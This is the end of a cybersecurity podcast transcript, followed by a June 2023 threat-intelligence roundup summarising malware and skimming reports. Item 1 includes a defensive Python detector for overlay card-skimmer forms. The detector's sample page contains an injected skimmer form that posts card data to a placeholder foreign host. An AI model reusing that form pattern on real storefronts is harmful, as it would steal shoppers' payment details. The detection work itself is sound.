Andrew: Defense in depth – like all the different layers. It’s more than just training your folks not to click on suspicious emails. Well there’s that, but then there’s also all of these like email filtering processes you can implement as well. Not one thing is gonna be the answer, but layering. I guess I’m explaining defense in depth now too. So I think that’s the answer.

Richard: I think this is a really great, like these sorts of things that people can practically do to protect themselves coming from someone like you is just so useful. All right, Ann, ask your closing question. You've been so good, Andrew, you're awesome.

Ann: Last question. At Resilience, we talk a lot about what makes a company cyber resilient. I’m curious how you would answer that question.

Andrew: So a layered approach to security. It's not one thing, it's a lot of layers. So for instance, in business email compromise, we were talking about how training employees to not click on suspicious links or don't click on ads that are being served up on your real estate. If you're on an intermediary service provider like you two, right? So it's not about always necessarily having the highest castle walls and the moat and the drawbridge and everything, but it's like what makes a company cyber resilient is that, you know, that you might get infiltrated, so to speak, and how can you then quickly quarantine that, get them out. So yeah, a layered approach. Defense in depth. There are critical security controls that just have to be a part of every organization. So, you know, it takes a village.

Ann: Alison echoes Andrew’s sentiment by acknowledging the reality that you will be attacked. Having this level of humility is essential, but how you arm yourself and stay vigilant is what will determine your success.

Alison: I think anyone who thinks they have it all figured out and are all buttoned up are the most susceptible. I think we can only strive to be better than someone behind us. I mean, the analogy I like to use is, if you’re in the woods and you run into a bear, you don’t need to outrun the bear. You just need to outrun the other person with you, right? And I think in the cyber resilience space, you don’t wanna be at the bottom of the barrel because that’s the easy pickings. And if you think you’re the best, you’re probably not. There’s always holes. So I think, staying humble and making sure that you’re doing everything you can. I guess that would be my answer.

Ann: Yeah. Awesome.

Richard: So we often talk about the need for more visibility. We've got a lot of telemetry on the security tools that we own. It could be scanning, it could be from penetration testing, it could be from security information and event management. It could be from your insurance policies and questionnaires. Adding dark web adds a lot more information about an area of extreme uncertainty. And if we get information from there about an actual attack on a specific company, or perhaps even a person and/or a whole segment, we've just really up-leveled our ability to respond. This is why having really great context, context that's connected across the stuff that you know empirically and the stuff you know as possibilities, and bringing that information to bear with risk transfer is so key and why it's such a key part of what we do at Resilience.

Ann: The darknet is big, it's diverse. There are a lot of different types of people in hoodies, not in hoodies, doing a lot of different types of things with different types of data. It's important that we all stay realistic and humble and pay attention to what's going on out in the internet land.

Richard: Thank you to Alison and Andrew for their time, expertise, and valuable insights. And to our production team at Come Alive Creative. Follow the Building Cyber Resilience Podcast wherever you listen so you don't miss an episode. We'll catch you on the next show.


Threat Intelligence RoundUp: May

June 01, 2023

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Hackers swap stealth for realistic checkout forms to steal credit cards – BleepingComputer

A report by Malwarebytes highlights how MageCart skimmers are hijacking real online stores' checkout pages with their own fraudulent but realistic-looking forms to steal credit card information. The forms are displayed as modal HTML pages that are convincingly superimposed onto the original page. The malware-laden checkout page is sophisticated and sometimes appears more legitimate than the real one.
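A defender who can fetch the HTML that shoppers actually receive (for example from a synthetic monitor) can look for the two traits this article describes: a card-capture form that sits inside a fixed or absolutely positioned overlay element, and one whose action posts card data somewhere other than the store's own host. The following is an added example written for this roundup item; it is not code from DarkOwl, Malwarebytes or BleepingComputer, and the sample page, the store origin `https://shop.example` and the skimmer host `cdn-payments-example.invalid` are all constructed placeholders.

```python
"""Heuristic scan of a checkout page for overlay-style card skimmer forms.

Added example, not code from the page's source article. Assumes the defender
holds the served HTML and knows the legitimate store origin. Two signals are
combined: (1) a form with card-number/expiry/CVV inputs is rendered inside an
element styled position:fixed|absolute with a z-index (a modal overlay), and
(2) the form's action targets a host other than the store's own.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings in name/id/autocomplete/placeholder that indicate card capture.
CARD_HINTS = ("cc-number", "cc-csc", "cc-exp", "cardnumber", "card_number",
              "ccnumber", "ccexp", "expiry", "cvv", "cvc")


def _looks_like_card_field(attrs):
    blob = " ".join((attrs.get(k) or "").lower()
                    for k in ("name", "id", "autocomplete", "placeholder"))
    return any(h in blob for h in CARD_HINTS)


def _is_overlay_style(style):
    s = style.replace(" ", "").lower()
    return ("position:fixed" in s or "position:absolute" in s) and "z-index" in s


class FormCollector(HTMLParser):
    """Collects forms, their action and card-field count, and whether each
    form sits under an overlay-styled ancestor."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._stack = []        # (tag, is_overlay) for every open element
        self._overlay_depth = 0  # >0 while inside an overlay-styled element
        self._form = None

    def _note_input(self, attrs):
        if self._form is not None and _looks_like_card_field(attrs):
            self._form["card_fields"] += 1

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        overlay = _is_overlay_style(a.get("style") or "")
        self._stack.append((tag, overlay))
        if overlay:
            self._overlay_depth += 1
        if tag == "form":
            self._form = {"action": a.get("action") or "", "card_fields": 0,
                          "in_overlay": self._overlay_depth > 0}
            self.forms.append(self._form)
        elif tag == "input":
            self._note_input(a)

    def handle_startendtag(self, tag, attrs):
        # Self-closing <input .../>: count it, but never push it on the stack.
        if tag == "input":
            self._note_input(dict(attrs))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed void elements.
        if not any(t == tag for t, _ in self._stack):
            return
        while True:
            t, overlay = self._stack.pop()
            if overlay:
                self._overlay_depth -= 1
            if t == tag:
                break
        if tag == "form":
            self._form = None


def scan_checkout_html(html, page_origin):
    """Return findings for card-capturing forms that show skimmer traits."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    own_host = urlparse(page_origin).hostname
    findings = []
    for f in parser.forms:
        if f["card_fields"] == 0:
            continue
        reasons = []
        action_host = urlparse(f["action"]).hostname  # None for relative actions
        if action_host and action_host != own_host:
            reasons.append(f"posts card data to foreign host {action_host}")
        if f["in_overlay"]:
            reasons.append("card form rendered inside a fixed/absolute overlay")
        if reasons:
            findings.append({"action": f["action"],
                             "card_fields": f["card_fields"], "reasons": reasons})
    return findings


# Constructed sample: the store's real form plus an injected overlay form.
SAMPLE_HTML = """
<html><body>
<div id="checkout">
  <form action="/checkout/pay" method="post">
    <input name="cardNumber" autocomplete="cc-number">
    <input name="expiry" autocomplete="cc-exp">
    <input name="cvc" autocomplete="cc-csc">
    <button>Pay</button>
  </form>
</div>
<div style="position: fixed; top: 0; left: 0; z-index: 99999">
  <form action="https://cdn-payments-example.invalid/collect" method="post">
    <input name="cardNumber" placeholder="Card number">
    <input name="ccexp" placeholder="MM/YY">
    <input name="cvv" placeholder="CVV">
    <button>Pay now</button>
  </form>
</div>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_checkout_html(SAMPLE_HTML, "https://shop.example"):
        print(finding["action"], "->", "; ".join(finding["reasons"]))
```

Run on the constructed page, only the injected form is reported, with both reasons. The heuristic is deliberately static: it says nothing about JavaScript that builds the overlay at runtime, so in practice it belongs alongside a rendered-DOM capture, not in place of one.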

2. ViperSoftX info-stealing malware now targets password managers – BleepingComputer

The most recent version of the ViperSoftX infostealer has been observed targeting password managers including KeePass and 1Password. Updated and more robust detection-evasion methods are also part of the new stealer. The malware installs a malicious extension called VenomSoftX into the Chrome, Brave, Edge, and Opera browsers. According to Trend Micro, the malware has targeted the consumer and enterprise sectors in the U.S., Italy, Brazil, India, Australia, Japan, Taiwan, Malaysia, and France. According to analysts the malware is distributed as software cracks, activators, and key generators and hides inside benign-looking software. A standout feature of the new version is its byte mapping used for code encryption, which remaps and changes the order of shellcode bytes.

3. Stealthy MerDoor malware uncovered after five years of attacks – BleepingComputer

A new Advanced Persistent Threat (APT) group named LanceFly has been using a custom, stealthy backdoor called “Merdoor” to target organizations in South and Southeast Asia since 2018. Methods for initial access are unclear, but Symantec has observed the group using techniques such as phishing emails and SSH credential brute forcing, among others. Merdoor is loaded into ‘perfhost.exe’ or ‘svchost.exe’, both legitimate Windows processes, through DLL side-loading. The backdoor is persistent and remains on devices between reboots. It establishes a connection with a C2 server, from which it can be given instructions. Read full article.

4. BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups – The Hacker News

With a moderate confidence level, Lookout has attributed a malware called BouldSpy (named DAAM by Cyble) to the Law Enforcement Command of the Islamic Republic of Iran. Victims of the malware include minority groups such as “Kurds, Baluchis, Azeris, and Armenian Christian groups.” It is an Android-based malware family, and the intrusion vector appears to be physical access to devices. It has a C2 panel for controlling victims’ devices and creates other malicious applications masquerading as harmless apps, such as a currency converter. Among its other notable features, it is able to disable battery-management features so that the victim device never terminates the malware. It utilizes an element from the open source CryDroid, which could indicate that the malware is still being developed or is being used as a false flag. Read more.

5. Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade – The Hacker News

The threat actor Bad Magic (aka Red Stinger) has been linked to new cyberattacks targeting companies in the Russo-Ukrainian area, but also to multiple activities dating back to May 2016, meaning that this threat actor has been active for longer than originally thought. Read here.

6. Malicious Windows kernel drivers used in BlackCat ransomware attacks – BleepingComputer

According to Trend Micro, the ALPHV ransomware group (aka BlackCat) has been observed employing an improved version of the signed malicious Windows kernel driver known as “POORTRY” in order to evade detection by security software while conducting its attacks. Read more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.
